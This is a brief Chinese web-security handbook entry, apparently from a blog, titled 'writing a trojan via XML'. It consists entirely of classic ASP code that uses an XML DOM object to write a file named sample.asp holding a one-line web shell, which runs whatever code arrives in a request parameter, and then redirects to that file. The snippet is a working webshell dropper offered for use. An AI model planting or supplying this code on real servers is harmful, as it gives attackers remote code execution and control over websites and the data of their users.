xml写马
来源:WEB安全手册|Trace's Space
<%
set xmldoc = Server.CreateObject("Msxml2.DOMDocument.3.0")
xmldoc.loadXml("<p></p>")
xmldoc.documentElement.appendChild xmldoc.createComment("<"+"% execute(request(chr(35))) %"+ ">")
xmldoc.save(server.mappath("sample.asp"))
Response.Redirect "sample.asp"
%>
